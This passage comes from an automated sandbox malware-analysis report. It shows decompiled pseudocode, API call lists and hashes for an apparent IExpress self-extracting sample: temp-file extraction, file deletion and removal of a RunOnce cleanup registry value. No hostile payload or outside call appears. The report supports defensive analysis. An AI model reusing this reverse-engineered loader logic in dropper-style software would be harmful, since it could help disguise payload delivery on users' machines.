                                                                                                                                                                                                          						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                          						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                          							goto L4;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							 *0x869124 = 0;
                                                                                                                                                                                                          							_t14 = 1;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					E008644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                          					 *0x869124 = E00866285();
                                                                                                                                                                                                          					_t14 = 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t14;
                                                                                                                                                                                                          			}













                                                                                                                                                                                                          0x008658cd
                                                                                                                                                                                                          0x008658d1
                                                                                                                                                                                                          0x008658d3
                                                                                                                                                                                                          0x008658d5
                                                                                                                                                                                                          0x008658d8
                                                                                                                                                                                                          0x008658d8
                                                                                                                                                                                                          0x008658da
                                                                                                                                                                                                          0x008658db
                                                                                                                                                                                                          0x008658e1
                                                                                                                                                                                                          0x008658ed
                                                                                                                                                                                                          0x008658f1
                                                                                                                                                                                                          0x0086591e
                                                                                                                                                                                                          0x0086592c
                                                                                                                                                                                                          0x00865943
                                                                                                                                                                                                          0x0086594a
                                                                                                                                                                                                          0x0086594d
                                                                                                                                                                                                          0x00865953
                                                                                                                                                                                                          0x00865959
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086595b
                                                                                                                                                                                                          0x0086595c
                                                                                                                                                                                                          0x00865963
                                                                                                                                                                                                          0x0086596c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865972
                                                                                                                                                                                                          0x00865974
                                                                                                                                                                                                          0x0086597a
                                                                                                                                                                                                          0x0086597a
                                                                                                                                                                                                          0x0086596c
                                                                                                                                                                                                          0x008658f3
                                                                                                                                                                                                          0x00865901
                                                                                                                                                                                                          0x00865906
                                                                                                                                                                                                          0x0086590b
                                                                                                                                                                                                          0x00865910
                                                                                                                                                                                                          0x00865910
                                                                                                                                                                                                          0x00865918

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00865534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008658E7
                                                                                                                                                                                                          • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00865534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00865943
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,00865534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0086594D
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00865534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0086595C
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00865534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00865963
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                          • API String ID: 747627703-2139698323
                                                                                                                                                                                                          • Opcode ID: 2b9a1b385f27db094a41fb842e3fcdf5f2bfd569dae69ecd732aaf60f84e8924
                                                                                                                                                                                                          • Instruction ID: b716dfcf3d893496d4ffc4fc8ed0e03f7c57d5c22b2cd1c120e03b2dc33cf587
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b9a1b385f27db094a41fb842e3fcdf5f2bfd569dae69ecd732aaf60f84e8924
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10113471600220ABC7241F79AC4DB9B7F9EFF46360F120619F50AE32C1DEB48805C6A1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 652 8651e5-86520b call 86468f LocalAlloc 655 86522d-86523c call 86468f 652->655 656 86520d-865228 call 8644b9 call 866285 652->656 662 865262-865270 lstrcmpA 655->662 663 86523e-865260 call 8644b9 LocalFree 655->663 670 8652b0 656->670 664 865272-865273 LocalFree 662->664 665 86527e-86529c call 8644b9 LocalFree 662->665 663->670 668 865279-86527c 664->668 674 8652a6 665->674 675 86529e-8652a4 665->675 672 8652b2-8652b5 668->672 670->672 674->670 675->668
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E008651E5(void* __eflags) {
                                                                                                                                                                                                          				int _t5;
                                                                                                                                                                                                          				void* _t6;
                                                                                                                                                                                                          				void* _t28;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t1 = E0086468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                          				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                          				if(_t28 != 0) {
                                                                                                                                                                                                          					if(E0086468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                          						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                          						if(_t5 != 0) {
                                                                                                                                                                                                          							_t6 = E008644B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                          							LocalFree(_t28);
                                                                                                                                                                                                          							if(_t6 != 6) {
                                                                                                                                                                                                          								 *0x869124 = 0x800704c7;
                                                                                                                                                                                                          								L10:
                                                                                                                                                                                                          								return 0;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							 *0x869124 = 0;
                                                                                                                                                                                                          							L6:
                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						LocalFree(_t28);
                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					E008644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                          					LocalFree(_t28);
                                                                                                                                                                                                          					 *0x869124 = 0x80070714;
                                                                                                                                                                                                          					goto L10;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				E008644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                          				 *0x869124 = E00866285();
                                                                                                                                                                                                          				goto L10;
                                                                                                                                                                                                          			}






                                                                                                                                                                                                          0x008651fb
                                                                                                                                                                                                          0x00865207
                                                                                                                                                                                                          0x0086520b
                                                                                                                                                                                                          0x0086523c
                                                                                                                                                                                                          0x00865268
                                                                                                                                                                                                          0x00865270
                                                                                                                                                                                                          0x0086528b
                                                                                                                                                                                                          0x00865293
                                                                                                                                                                                                          0x0086529c
                                                                                                                                                                                                          0x008652a6
                                                                                                                                                                                                          0x008652b0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008652b0
                                                                                                                                                                                                          0x0086529e
                                                                                                                                                                                                          0x00865279
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086527b
                                                                                                                                                                                                          0x00865273
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865273
                                                                                                                                                                                                          0x0086524a
                                                                                                                                                                                                          0x00865250
                                                                                                                                                                                                          0x00865256
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865256
                                                                                                                                                                                                          0x00865219
                                                                                                                                                                                                          0x00865223
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646A0
                                                                                                                                                                                                            • Part of subcall function 0086468F: SizeofResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646A9
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646C3
                                                                                                                                                                                                            • Part of subcall function 0086468F: LoadResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646CC
                                                                                                                                                                                                            • Part of subcall function 0086468F: LockResource.KERNEL32(00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646D3
                                                                                                                                                                                                            • Part of subcall function 0086468F: memcpy_s.MSVCRT ref: 008646E5
                                                                                                                                                                                                            • Part of subcall function 0086468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008646EF
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00862F4D,?,00000002,00000000), ref: 00865201
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00865250
                                                                                                                                                                                                            • Part of subcall function 008644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                            • Part of subcall function 008644B9: MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                            • Part of subcall function 00866285: GetLastError.KERNEL32(00865BBC), ref: 00866285
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                          • String ID: <None>$UPROMPT
                                                                                                                                                                                                          • API String ID: 957408736-2980973527
                                                                                                                                                                                                          • Opcode ID: 749673c12c08e511b20bfc6a76a1e857802e6df0248f4b6754157231666dfa62
                                                                                                                                                                                                          • Instruction ID: c205b1327af470fd234488771dc338c82de302d50aa0e1b94ab8770412edf395
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 749673c12c08e511b20bfc6a76a1e857802e6df0248f4b6754157231666dfa62
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D911D0B1201605BBE7146BB55D5AB3B719EFB89788F134029F742E6391EEBD8C00462A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                                          			E008652B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				signed int _t9;
                                                                                                                                                                                                          				signed int _t11;
                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                          				CHAR** _t31;
                                                                                                                                                                                                          				void* _t32;
                                                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t28 = __edi;
                                                                                                                                                                                                          				_t22 = __ecx;
                                                                                                                                                                                                          				_t21 = __ebx;
                                                                                                                                                                                                          				_t9 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                                          				_t31 =  *0x8691e0; // 0x2df8360
                                                                                                                                                                                                          				if(_t31 != 0) {
                                                                                                                                                                                                          					_push(__edi);
                                                                                                                                                                                                          					do {
                                                                                                                                                                                                          						_t29 = _t31;
                                                                                                                                                                                                          						if( *0x868a24 == 0 &&  *0x869a30 == 0) {
                                                                                                                                                                                                          							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                          							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t31 = _t31[1];
                                                                                                                                                                                                          						LocalFree( *_t29);
                                                                                                                                                                                                          						LocalFree(_t29);
                                                                                                                                                                                                          					} while (_t31 != 0);
                                                                                                                                                                                                          					_pop(_t28);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t11 =  *0x868a20; // 0x0
                                                                                                                                                                                                          				_pop(_t32);
                                                                                                                                                                                                          				if(_t11 != 0 &&  *0x868a24 == 0 &&  *0x869a30 == 0) {
                                                                                                                                                                                                          					_push(_t22);
                                                                                                                                                                                                          					E00861781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                          					if(( *0x869a34 & 0x00000020) != 0) {
                                                                                                                                                                                                          						E008665E8( &_v268);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                          					_t22 =  &_v268;
                                                                                                                                                                                                          					E00862390( &_v268);
                                                                                                                                                                                                          					_t11 =  *0x868a20; // 0x0
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if( *0x869a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                          					_t11 = E00861FE1(_t22); // executed
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				 *0x868a20 =  *0x868a20 & 0x00000000;
                                                                                                                                                                                                          				return E00866CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                          			}












                                                                                                                                                                                                          0x008652b6
                                                                                                                                                                                                          0x008652b6
                                                                                                                                                                                                          0x008652b6
                                                                                                                                                                                                          0x008652c1
                                                                                                                                                                                                          0x008652c8
                                                                                                                                                                                                          0x008652cb
                                                                                                                                                                                                          0x008652cc
                                                                                                                                                                                                          0x008652d4
                                                                                                                                                                                                          0x008652d6
                                                                                                                                                                                                          0x008652d7
                                                                                                                                                                                                          0x008652de
                                                                                                                                                                                                          0x008652e0
                                                                                                                                                                                                          0x008652f2
                                                                                                                                                                                                          0x008652fa
                                                                                                                                                                                                          0x008652fa
                                                                                                                                                                                                          0x00865302
                                                                                                                                                                                                          0x00865305
                                                                                                                                                                                                          0x0086530c
                                                                                                                                                                                                          0x00865312
                                                                                                                                                                                                          0x00865316
                                                                                                                                                                                                          0x00865316
                                                                                                                                                                                                          0x00865317
                                                                                                                                                                                                          0x0086531c
                                                                                                                                                                                                          0x0086531f
                                                                                                                                                                                                          0x00865333
                                                                                                                                                                                                          0x00865345
                                                                                                                                                                                                          0x00865351
                                                                                                                                                                                                          0x00865359
                                                                                                                                                                                                          0x00865359
                                                                                                                                                                                                          0x00865363
                                                                                                                                                                                                          0x00865369
                                                                                                                                                                                                          0x0086536f
                                                                                                                                                                                                          0x00865374
                                                                                                                                                                                                          0x00865374
                                                                                                                                                                                                          0x00865381
                                                                                                                                                                                                          0x00865387
                                                                                                                                                                                                          0x00865387
                                                                                                                                                                                                          0x0086538f
                                                                                                                                                                                                          0x008653a0

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFileAttributesA.KERNELBASE(02DF8360,00000080,?,00000000), ref: 008652F2
                                                                                                                                                                                                          • DeleteFileA.KERNELBASE(02DF8360), ref: 008652FA
                                                                                                                                                                                                          • LocalFree.KERNEL32(02DF8360,?,00000000), ref: 00865305
                                                                                                                                                                                                          • LocalFree.KERNEL32(02DF8360), ref: 0086530C
                                                                                                                                                                                                          • SetCurrentDirectoryA.KERNELBASE(008611FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00865363
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00865334
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                          • API String ID: 2833751637-2312194364
                                                                                                                                                                                                          • Opcode ID: a5f94e97cfaefb19e0b6bf88f68344f2f7ad4317c9702708ad58d07704079947
                                                                                                                                                                                                          • Instruction ID: 0d3cf67b9169ea1a218d00c450c1bce7c49d55812931b1efa1168bc0be72c6ef
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5f94e97cfaefb19e0b6bf88f68344f2f7ad4317c9702708ad58d07704079947
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D21CF31900A24DBCB349F54EE1AB6937B4FB11B41F0B2259E986E63A0CFF45C84CB42
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00861FE1(void* __ecx) {
                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                          				long _t4;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				if( *0x868530 != 0) {
                                                                                                                                                                                                          					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                          					if(_t4 == 0) {
                                                                                                                                                                                                          						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                                                                                                                                                          						return RegCloseKey(_v8);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t4;
                                                                                                                                                                                                          			}





                                                                                                                                                                                                          0x00861fee
                                                                                                                                                                                                          0x00862005
                                                                                                                                                                                                          0x0086200d
                                                                                                                                                                                                          0x00862017
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862020
                                                                                                                                                                                                          0x0086200d
                                                                                                                                                                                                          0x00862029

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0086538C,?,?,0086538C), ref: 00862005
                                                                                                                                                                                                          • RegDeleteValueA.KERNELBASE(0086538C,wextract_cleanup0,?,?,0086538C), ref: 00862017
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(0086538C,?,?,0086538C), ref: 00862020
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                          • API String ID: 849931509-702805525
                                                                                                                                                                                                          • Opcode ID: 53c7bb2fc812a9c7f844a199faae4e88520772b44264be2396aa4bcc0472abe8
                                                                                                                                                                                                          • Instruction ID: d9111e55a14020002a506e61199f869f496dc4e0b5b36fd27f1eef70d680144a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53c7bb2fc812a9c7f844a199faae4e88520772b44264be2396aa4bcc0472abe8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10E04F30555B19FBD7258B91EC4EF597B29F700740F120295FA09F0160EBB15A14DA07
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                          			E00864CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t29;
                                                                                                                                                                                                          				int _t30;
                                                                                                                                                                                                          				long _t32;
                                                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                                                          				long _t35;
                                                                                                                                                                                                          				long _t36;
                                                                                                                                                                                                          				struct HWND__* _t37;
                                                                                                                                                                                                          				long _t38;
                                                                                                                                                                                                          				long _t39;
                                                                                                                                                                                                          				long _t41;
                                                                                                                                                                                                          				long _t44;
                                                                                                                                                                                                          				long _t45;
                                                                                                                                                                                                          				long _t46;
                                                                                                                                                                                                          				signed int _t50;
                                                                                                                                                                                                          				long _t51;
                                                                                                                                                                                                          				char* _t58;
                                                                                                                                                                                                          				long _t59;
                                                                                                                                                                                                          				char* _t63;
                                                                                                                                                                                                          				long _t64;
                                                                                                                                                                                                          				CHAR* _t71;
                                                                                                                                                                                                          				CHAR* _t74;
                                                                                                                                                                                                          				int _t75;
                                                                                                                                                                                                          				signed int _t76;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t69 = __edx;
                                                                                                                                                                                                          				_t29 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                          				_v8 = _t30;
                                                                                                                                                                                                          				_t75 = _a8;
                                                                                                                                                                                                          				if( *0x8691d8 == 0) {
                                                                                                                                                                                                          					_t32 = _a4;
                                                                                                                                                                                                          					__eflags = _t32;
                                                                                                                                                                                                          					if(_t32 == 0) {
                                                                                                                                                                                                          						_t33 = E00864E99(_t75);
                                                                                                                                                                                                          						L35:
                                                                                                                                                                                                          						return E00866CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t35 = _t32 - 1;
                                                                                                                                                                                                          					__eflags = _t35;
                                                                                                                                                                                                          					if(_t35 == 0) {
                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                          						_t33 = 0;
                                                                                                                                                                                                          						goto L35;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t36 = _t35 - 1;
                                                                                                                                                                                                          					__eflags = _t36;
                                                                                                                                                                                                          					if(_t36 == 0) {
                                                                                                                                                                                                          						_t37 =  *0x868584; // 0x0
                                                                                                                                                                                                          						__eflags = _t37;
                                                                                                                                                                                                          						if(_t37 != 0) {
                                                                                                                                                                                                          							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t54 = 0x8691e4;
                                                                                                                                                                                                          						_t58 = 0x8691e4;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t38 =  *_t58;
                                                                                                                                                                                                          							_t58 =  &(_t58[1]);
                                                                                                                                                                                                          							__eflags = _t38;
                                                                                                                                                                                                          						} while (_t38 != 0);
                                                                                                                                                                                                          						_t59 = _t58 - 0x8691e5;
                                                                                                                                                                                                          						__eflags = _t59;
                                                                                                                                                                                                          						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                          						_t73 =  &(_t71[1]);
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t39 =  *_t71;
                                                                                                                                                                                                          							_t71 =  &(_t71[1]);
                                                                                                                                                                                                          							__eflags = _t39;
                                                                                                                                                                                                          						} while (_t39 != 0);
                                                                                                                                                                                                          						_t69 = _t71 - _t73;
                                                                                                                                                                                                          						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                          						__eflags = _t30 - 0x104;
                                                                                                                                                                                                          						if(_t30 >= 0x104) {
                                                                                                                                                                                                          							L3:
                                                                                                                                                                                                          							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                          							goto L35;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t69 = 0x8691e4;
                                                                                                                                                                                                          						_t30 = E00864702( &_v268, 0x8691e4,  *(_t75 + 4));
                                                                                                                                                                                                          						__eflags = _t30;
                                                                                                                                                                                                          						if(__eflags == 0) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t41 = E0086476D( &_v268, __eflags);
                                                                                                                                                                                                          						__eflags = _t41;
                                                                                                                                                                                                          						if(_t41 == 0) {
                                                                                                                                                                                                          							goto L9;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_push(0x180);
                                                                                                                                                                                                          						_t30 = E00864980( &_v268, 0x8302); // executed
                                                                                                                                                                                                          						_t75 = _t30;
                                                                                                                                                                                                          						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                          						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t30 = E008647E0( &_v268);
                                                                                                                                                                                                          						__eflags = _t30;
                                                                                                                                                                                                          						if(_t30 == 0) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						 *0x8693f4 =  *0x8693f4 + 1;
                                                                                                                                                                                                          						_t33 = _t75;
                                                                                                                                                                                                          						goto L35;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t44 = _t36 - 1;
                                                                                                                                                                                                          					__eflags = _t44;
                                                                                                                                                                                                          					if(_t44 == 0) {
                                                                                                                                                                                                          						_t54 = 0x8691e4;
                                                                                                                                                                                                          						_t63 = 0x8691e4;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t45 =  *_t63;
                                                                                                                                                                                                          							_t63 =  &(_t63[1]);
                                                                                                                                                                                                          							__eflags = _t45;
                                                                                                                                                                                                          						} while (_t45 != 0);
                                                                                                                                                                                                          						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                          						_t64 = _t63 - 0x8691e5;
                                                                                                                                                                                                          						__eflags = _t64;
                                                                                                                                                                                                          						_t69 =  &(_t74[1]);
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t46 =  *_t74;
                                                                                                                                                                                                          							_t74 =  &(_t74[1]);
                                                                                                                                                                                                          							__eflags = _t46;
                                                                                                                                                                                                          						} while (_t46 != 0);
                                                                                                                                                                                                          						_t73 = _t74 - _t69;
                                                                                                                                                                                                          						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                          						__eflags = _t30 - 0x104;
                                                                                                                                                                                                          						if(_t30 >= 0x104) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t69 = 0x8691e4;
                                                                                                                                                                                                          						_t30 = E00864702( &_v268, 0x8691e4,  *(_t75 + 4));
                                                                                                                                                                                                          						__eflags = _t30;
                                                                                                                                                                                                          						if(_t30 == 0) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						}
